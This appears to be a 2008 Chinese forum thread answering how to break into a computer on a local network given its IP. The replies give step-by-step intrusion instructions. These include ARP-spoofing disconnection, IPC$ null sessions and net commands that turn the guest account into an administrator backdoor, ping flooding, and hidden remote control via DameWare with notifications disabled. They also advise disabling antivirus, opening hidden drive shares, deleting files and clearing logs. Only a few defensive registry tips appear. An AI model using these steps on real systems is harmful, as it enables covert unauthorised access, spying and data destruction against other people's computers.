在同一局域网内,已知对方IP 如何入侵电脑

要求回答图文并茂,新人给转正,其他给介尼100....


时间有效性二天!!

[localimg=400,227]7[/localimg]对于局域网用户来说，最大的优点是可以共享局域网中的资源，但这有时候也会碰到麻烦，偏偏在要共享其他计算机上的共享资源时，却无缘无故从网络中断开了，可过一会儿又通了，你说气不气，这就可能是局域网某一用户在用“局域网终结者”把你的计算机从网络中强行断开了！

　　局域网终结者主界面窗口如图1，其原理是：用于构造虚假ARP包来欺骗网络主机，使得被指定的主机被从网络中断开；程序只对以路由作为划分的同一局域内主机产生作用。使用方法也非常简单，将目标IP地址加入到阻断列表中即可。如果退出程序或将目标IP从列表中移除后目标主机将在30至60后恢复正常工作（有的系统可能需要更长时间）。



图1


　　要注意的是，在使用局域网终结者之前请先安装好WinPcap3.0。
　　下载URL http://www.chinesehack.org/down/show.asp?id=2779&down=1

　　二、防范共享资源入侵

　　一般局域网中的服务器都使用的是Win 2000 Server/WINDOWS XP系统，而客户端计算机使用的操作系统有Win98或Win2000 Pro/XP等。
比如现在有一台客户机已经登录到域domain，则它可使用默认共享方式入侵服务器：在该客户机的网络邻居地址栏中输入\\server\admin$，便可进入Win2000的系统目录Win NT，此时该用户可以删除文件。若再输入\\server\d$，即可进入服务器上的D盘，此时该客户机用户已经具备服务器的管理员权限，这是相当危险的。居心叵测的人可以通过新建Winstart.bat或者Wininit.ini文件，并在其中加入格式化C盘的语句，使系统丢失所有C盘文件； 或是在服务器的启动项中加入现在任何流行木马的启动程序，后果也不堪设想。

　　Win2000/XP采用默认共享方式来方便远程维护，但同时也给了有心者可乘之机。怎么办？可能通过修改注册表来关闭默认共享，打开注册表编辑器，依次打开HKEY_L0CAl_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver，若系统为Win2000 Pro，则新建Autosharewks的DWORD值，并设键值为0；若系统为Win2000 Server，则新建Autoshareserver的DWORD值，并设键值为0。重新启动计算机后就关闭了默认共享。

　　不过不要以为这样别人就不能通过共享来入侵服务器了，装有Win2000平台的客户机还可以通过IPS$的空连接入侵服务器。客户机用户可以先用端口扫描软件，这里以X-Scan 2.3为蓝本，在“扫描参数”对话窗口中填入服务器的IP地址，在“扫描模块”对话窗口中选择“sql server弱口令”和“nt-server弱口令”，单击“开始扫描”即开始探测，当得到nt-server弱口令后，可在客户机的命令行状态窗口中输入命令：“net use \\192.168.0.1\ipc$ "wmgwmg" /user:snow”来建立一IPC$对话，运行命令：net user guest /active:yes 将Guest帐户激活，然后运行命令：net localgroup administrators guest /add 将GUEST帐户添加到管理员组（如图2），然后设置好后门，这样就可以进行远程控制啦。



图2


　　够危险吧！管理员怎么禁止IPS$空连接呢？在注册表编辑器找到子键HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA，修改Restrict Anony-mous的DWORD值为0000001。或者是运行命令：net share ipc$ /delete

　　三、抵挡Ping洪水攻击

　　WINDOWS 提供一个PING程序，使用它可以测试网络是否连接，偶在此讲的Ping洪水攻击也称为ICMP入侵，它是利用Windows系统的漏洞来入侵的。在工作中的命令行状态运行如下命令：“ping -1 65500 -t 192.168.0.1”，192.168.0.1是局域网服务器的IP地址（如图3），这样就会不断地向服务发送大量的数据请求，如果局域网内的计算机很多，且同时都运行了命令：“ping -l 65500 -t 192.168.0.1”，想一想有什么结果呢？呵呵~~~ 服务器将会因CPU使用率居高不下而崩溃，这种攻击方式也称DoS攻击（拒绝服务攻击），即在一个时段内连续向服务器发出大量请求，服务器来不及回应而死机。



图3


　　在抵挡PING洪水攻击，建议安装网络防火墙（如天网），在设置里面选择“不允许别人用Ping命令探测本机”。当然也可在“管理工具”中打开“本地安全策略”，进入“IP安全策略”进行IP安全配置。

[ 本帖最后由 ytfjaj 于 2008-3-17 14:35 编辑 ]

很简单，空了给你发上来；不过不许干坏事哦；
如果你能把对方电脑的telnet启用的话就更简单了

1.入侵的范围只包括局域网，如果在学校上，可以入侵整个校园网；
2.能入侵的只是存在弱口令(用户名为administrator等,密码为空)，并且开了139端口，但没开防火墙的机子。

入侵工具：

一般要用到三个：NTscan变态扫描器，Recton--D贺免杀专用版，DameWare迷你中文版 4.5. （前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀。）

入侵步骤：

1.使用"NTscan变态扫描器"，在IP处填上要扫描的IP范围，选择"WMI扫描"方式，按"开始"后就等扫描结果了。

2.使用"Recton--D贺免杀专用版"

选择"CMD命令"项，在"CMD:"中输入"net share C$=C:\"，即可开启远程主机的C盘共享，以此将"C"换成D,E,F等，即可开启D盘，E盘，F盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入"\\对方IP\C$"，即可进入对方C盘。

选择"Telnet"项，在"远程主机"中输入刚才扫描到的一个IP，远程启动Telnet服务，成功后在"CMD选项"中，执行命令："net share ipc$",接着执行："net share admin$",最后执行"net use \\***.***.***.***\IPC$ "" /user：administrator"在*处填入你入侵的主机IP。

3.使用"DameWare迷你中文版 4.5"，安装后点"DameWare Mini Remote Control"，在"帮助"项中选择激活产品，输入注册信息，成功注册后，进入"远程连接"窗口，在"主机"处填入IP地址，点"设置"，在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选，在"用户选项"中去掉"启用用户选项菜单"。设置完成好后，就可点"连接"，在弹出的对话框中点"确定"后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕。 注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。

入侵步骤补充：

1.在以上第2步中，远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。

2.Recton--D贺免杀专用版还有其他功能，在"进程"项中，可以查看远程主机的进程，并可任意结束其中进程；在"共享"项中，可以创建共享，我常用的是创建C$,D$,E$,F$,共享路径分别对应C：\,D：\等，共享好后在地址栏中输入"\\IP\C$",进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后最好还是把共享给关掉。最后选"日志"，清除所有日志，不留痕迹。这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。

3.上面的共享可通过CMD(程序-附件-命令提示符)完成，首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后，开共享用net share命令，共享C$(即C盘)："net share C$=C：",共享system文件夹："net share c=c：\winnt\system32",共享IPC$用："net share IPC$"等,最后是关闭共享，关闭C盘共享："net share C$ /del"。

4.为方便下次入侵，可以设置后门， 查看用户："net user",激活guest用户
"net user guest /active：yes",更改guest的密码为poco："net user guest poco",把guest的权限提升为管理员权限："net localgroup administrators guest /add"。

5.telnet命令(DOS命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：""dir d：\",查看C盘program file文件夹："dir c：\PROGRA~1\;",60秒倒记时关机："shutdown -s -t 60"

补充说明：

1.net use错误原因解决：

(1)."发生系统错误 1326。 登录失败： 未知的用户名或错误密码。"
在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接，是无法访问C$等管理共享的.

(2)"发生系统错误 1327。 登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。"在远程机的"控制面板－管理工具－本地安全策略－安全选项－用户权限"指派里，禁用"空密码用户只能进行控制台登陆".

(3)"//IP/c$"时提示找不到网络途径。在"网络和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性，进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS

说的不是很好

有些是转来的

但还是希望管理员给我转正机会

谢谢

小日本不能回复我的帖子..

不太明白